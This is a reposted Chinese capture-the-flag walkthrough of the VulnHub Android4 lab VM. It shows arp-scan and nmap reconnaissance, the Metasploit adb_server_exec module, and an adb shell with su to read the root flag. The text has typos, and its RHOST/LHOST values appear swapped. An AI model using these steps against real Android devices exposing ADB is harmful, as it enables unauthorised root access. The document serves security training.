记一次对`vulnhub`中`Android4`靶机渗透测试全过程
记一次对vulnhub
中Android4
靶机渗透测试全过程
首发于先知社区:https://xz.aliyun.com/t/2859
Android4
靶机简介
名称:Android4
操作系统:Android v4.4
标志:/data/root/
(在此目录中)
等级:初学者。
下载链接:Android4
:https://download.vulnhub.com/android4/Android4.ova
搭建成功的Android
平台
知识点
-
端口扫描和
IP
发现 -
使用
adb_server_exec
攻击端口8080代理 -
使用
ADB
连接到设备。 -
使用
metasploit
。 -
特权升级和找到答案
渗透过程
1:获取IP地址
使用命令:arp-scan -l
由此我们可以看到靶机的IP
地址:192.168.232.146
2:扫描开放端口
在此扫描中,我们将使用最流行的工具nmap
进行全端激进扫描
使用命令:nmap -p- -A 192.168.232.146
由此我确定存在与端口8080
相关的某种网页。
没有任何延迟,我打开了网页,但什么也没找到。
大多数人都会确定使用POST
方法涉及某种语言篡改。我也尝试过,但没有发现任何有用的东西。
在尝试了一些其他方法(PHP CLI
和Dropbear RCE
)之后,我发现了一种比较好的方法
关于PHP CLI
的漏洞扫描:searchsploit -w php cli
(关于searchsploit
的使用方法:记一次在实战靶机中使用SearchSploit
的总结)
我试过PHP CLI
和Dropbear RCE
之后发现Dropbear
的扫描会得到有用的信息
Android Debug Bridge(adb)
是一个多功能的命令行工具,可让您与设备进行通信(关于adb
的使用方法:adb使用-详细教程(Awesome Adb))
adb
命令可以促进各种设备操作,例如安装和调试应用程序,并且可以访问可用于在设备上运行各种命令的Unix shell
。
它是一个客户端 - 服务器程序,包括三个组件
1:发送命令的客户端。客户端在您的开发计算机上运行。您可以通过发出adb命令从命令行终端调用客户端。 2:一个守护程序(adbd),它在设备上运行命令。守护程序在每个设备上作为后台进程运行。 3:服务器,用于管理客户端和守护程序之间的通信。服务器作为开发计算机上的后台进程运行。
如果您没有安装adb
,可以通过sudo apt-get install adb
安装它
sudo apt-get install abd
要启动ADB服务器,我们使用了metasploit
:
首先:启动metasploit
msfconsole
本地端口很可能不接受连接。在这种情况下,我们将默认端口从4444
更改为3333
use exploit/android/adb/adb_server_exec set RHOST 192.168.232.145 set LHOST 192.168.232.146 set LPORT 3333 exploit
接下来就是需要使用adb
只要上面状态显示“正在连接到设备”,在新的终端窗口上键入命令:
adb connect 192.168.232.146:5555 adb shell
我们查看一下密码:
并没有发现什么有用的内容
去defaullt
目录:
su id ls
在/data
目录中,我们找到了一个名为“root
”的文件夹
cd /data ls
最后一步是成功得到答案:
cd /root ls cat flag.txt
参考资料:
破解Android4
:演练(CTF
挑战):http://www.hackingarticles.in/hack-the-android4-walkthrough-ctf-challenge/
adb
使用-详细教程(Awesome Adb
):https://blog.csdn.net/u010610691/article/details/77663770
记一次在实战靶机中使用SearchSploit
的总结:https://xz.aliyun.com/t/2857
低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。
持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。
转载内容版权归作者及来源网站所有,本站原创内容转载请注明来源。
- 上一篇
Android Handler机制(不含源码解析,适合新手理解)
一、官方解释 A Handler allows you to send and process [Message](https://developer.android.com/reference/android/os/Message.html) and Runnable objects associated with a thread's [MessageQueue](https://developer.android.com/reference/android/os/MessageQueue.html). Each Handler instance is associated with a single thread and that thread's message queue. When you create a new Handler, it is bound to the thread / message queue of the thread that is creating it -- from that point on, it will deliver message...
- 下一篇
ORMLite框架 的使用方法---给你的数据库操作插上翅膀
一:首先下载 ORMLite Jar 包 先去 ORMLite官网下载jar包 写博客时,目前最新的,对于Android为:ormlite-android-5.0.jar 和 ormlite-core-5.0.jar ; 然后分包处理,建议如图所示分包: 二:配置Bean类 @DatabaseTable(tableName="Book")publicclassMyBean{ @DatabaseField(generatedId=true) privateintid; @DatabaseField(columnName="name") publicStringname; @DatabaseField(columnName="author") publicStringauthor; @DatabaseField(columnName="price") publicStringprice; @DatabaseField(columnName="pages") publicintpages; publicStringgetAuthor(){ returnauthor; } publicvoid...
相关文章
文章评论
共有0条评论来说两句吧...
文章二维码
点击排行
推荐阅读
最新文章
- 设置Eclipse缩进为4个空格,增强代码规范
- CentOS6,CentOS7官方镜像安装Oracle11G
- SpringBoot2整合Thymeleaf,官方推荐html解决方案
- CentOS7编译安装Cmake3.16.3,解决mysql等软件编译问题
- SpringBoot2配置默认Tomcat设置,开启更多高级功能
- SpringBoot2全家桶,快速入门学习开发网站教程
- Docker快速安装Oracle11G,搭建oracle11g学习环境
- CentOS7,CentOS8安装Elasticsearch6.8.6
- CentOS8,CentOS7,CentOS6编译安装Redis5.0.7
- MySQL8.0.19开启GTID主从同步CentOS8